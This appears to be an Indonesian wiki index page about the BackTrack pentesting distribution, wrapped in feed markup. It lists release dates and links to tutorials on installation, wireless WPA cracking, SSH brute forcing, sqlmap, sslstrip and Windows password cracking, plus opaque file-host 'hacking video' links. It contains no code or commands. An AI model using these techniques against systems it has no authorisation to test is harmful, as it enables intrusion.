 11-02-2009 Backtrack 4 first beta release ([[Backtrack]] sekarang berbasis [[Debian]])&lt;br /&gt;
 19-06-2009 BackTrack 4 pre-final release.&lt;br /&gt;
 09-01-2010 BackTrack 4 final release.&lt;br /&gt;
 05-08-2010 Backtrack 4 R1 release&lt;br /&gt;
 10-05-2011 BackTrack 5 Released&lt;br /&gt;
&lt;br /&gt;
==Instalasi==&lt;br /&gt;
* [[Backtrack: Daftar Repository]]&lt;br /&gt;
* [[Backtrack: Membuat Repository Backtrack menggunakan debmirror]]&lt;br /&gt;
* [[Backtrack: Membuat Repository Backtrack menggunakan wget]] - lebih mudah&lt;br /&gt;
* [[Backtrack: Install di Harddisk]]&lt;br /&gt;
* [[Backtrack: Instalsi LiveUSB]]&lt;br /&gt;
* http://www.zimbio.com/Ubuntu+Linux/articles/e1_qHsbCMfz/Install+Backtrack+Applications+Ubuntu&lt;br /&gt;
* [[Backtrack: Install Aplikasi Backtrack di Ubuntu]]&lt;br /&gt;
&lt;br /&gt;
===Ubuntu Pentest Edition===&lt;br /&gt;
&lt;br /&gt;
* http://www.ubuntugeek.com/ubuntu-pentest-edition-for-penetration-testing.html&lt;br /&gt;
* http://www.netinfinity.org/tools/&lt;br /&gt;
* http://www.netinfinity.org/download/&lt;br /&gt;
&lt;br /&gt;
==Konfigurasi Backtrack==&lt;br /&gt;
* [[Backtrack: Mengaktifkan Interface]]&lt;br /&gt;
* [[Backtrack: Mengkonfigurasi IP address]]&lt;br /&gt;
* [[Backtrack: Menyambungkan ke Wireless HotSpot]]&lt;br /&gt;
* [[Backtrack:_Upgrade_Ke_Versi_Terbaru]]&lt;br /&gt;
* http://indobacktrack.or.id/2009/05/backtrack-4-tanpa-lilo&lt;br /&gt;
* http://indobacktrack.or.id/2009/04/konfiguras-ip-di-backtrack-3/&lt;br /&gt;
* http://www.backtrack-linux.org/tutorials/customize-backtrack/&lt;br /&gt;
* http://www.offensive-security.com/backtrack/customising-backtrack-live-cd-the-easy-way/&lt;br /&gt;
* [[Backtrack: Menyambungkan modem ZTE AC2726i]]&lt;br /&gt;
* [[dnsset]] Konfigurasi [[DNS]] Otomatis&lt;br /&gt;
&lt;br /&gt;
==Enumeration==&lt;br /&gt;
* [[Cari Subdomain Dengan dnsmap]]&lt;br /&gt;
* [[Backtrack: DMitry]] Deepmagic Information Gathering Tool&lt;br /&gt;
* [[CMS Identification Menggunakan whatweb]]&lt;br /&gt;
&lt;br /&gt;
==Wireless Hacking==&lt;br /&gt;
* [[Wireless Hacking]]&lt;br /&gt;
* [[Kismet | Backtrack: Kismet Scanning Frekuensi]]&lt;br /&gt;
* [[Backtrack: Tutorial cracking WPA PSK]]&lt;br /&gt;
* http://indobacktrack.or.id/2009/06/hacking-wifi-di-backtrack-3/&lt;br /&gt;
* http://indobacktrack.or.id/2009/09/cracking-wpawpa2-psk-gpu-dengan-pyrit-pre-build-packages-bawaan-backtrack/&lt;br /&gt;
* http://code.google.com/p/pyrit/&lt;br /&gt;
* [[Tutorial agak lengkap tentang Wireless Hacking WEP dan WPA]]&lt;br /&gt;
&lt;br /&gt;
==Hacking==&lt;br /&gt;
* [[Instalasi Web Scarab Vulnerabilities Scanner]]&lt;br /&gt;
* http://indobacktrack.or.id/2010/05/instalasi-web-scarab-vulnerabilities-scanner/&lt;br /&gt;
* [[Backtrack: Cracking Password Windows]]&lt;br /&gt;
* [[Backtrack: sslstrip - hacking https]]&lt;br /&gt;
* http://sectools.org/web-scanners.html&lt;br /&gt;
* [[Backtrack: Kumpulan Wordlist]]&lt;br /&gt;
* [[Backtrack: Menjebol SSH secara BruteForce]]&lt;br /&gt;
* [[Backtrack: sqlmap untuk menjebol dynamic web]]&lt;br /&gt;
* [[Backtrack: mysqlaudit untuk audit MySQL]]&lt;br /&gt;
* [[nmap: scanning sebuah mesin]]&lt;br /&gt;
* http://ezine.echo.or.id/ezine8/ez-r08-zylon-johntheripper.txt&lt;br /&gt;
* [[Melihat struktur folder web server]]&lt;br /&gt;
* [[OS Fingerprinting Menggunakan zenmap]]&lt;br /&gt;
&lt;br /&gt;
===Hacking Video===&lt;br /&gt;
&lt;br /&gt;
* http://www.fileserve.com/file/bA44ghM&lt;br /&gt;
* http://www.fileserve.com/file/KEwD6ub&lt;br /&gt;
* http://www.fileserve.com/file/xYPWeWY&lt;br /&gt;
* http://www.fileserve.com/file/7PbFvWj&lt;br /&gt;
* http://www.fileserve.com/file/MWBMqeU&lt;br /&gt;
* http://www.fileserve.com/file/VDPfSER&lt;br /&gt;
* http://www.fileserve.com/file/gGxPUWH&lt;br /&gt;
* http://www.fileserve.com/file/kdKmTfx&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
&lt;br /&gt;
* http://id-backtrack.com&lt;br /&gt;
* http://indobacktrack.or.id/&lt;br /&gt;
* http://www.backtrack-linux.org&lt;br /&gt;
* http://www.backtrack-linux.org/downloads/&lt;br /&gt;
* http://www.backtrack-linux.org/tutorials/backtrack-forensics/&lt;br /&gt;
* http://www.backtrack-linux.org/bt/wireless-drivers/&lt;br /&gt;
* http://www.offensive-security.com/backtrack/penetration-testing-information-security-distribution/&lt;br /&gt;
* http://www.ilmuhacking.com/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
* [[GnackTrack]]&lt;br /&gt;
* [[Ubuntu Pentest Edition]]&lt;br /&gt;
* [[Samurai Pentest]]&lt;br /&gt;
* [[Beberapa Tip Hacking]]&lt;br /&gt;
* [[Wireless Hacking]]&lt;br /&gt;
* [[Keamanan Jaringan]]&lt;br /&gt;
&lt;br /&gt;
[[Category: hacking]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
</feed>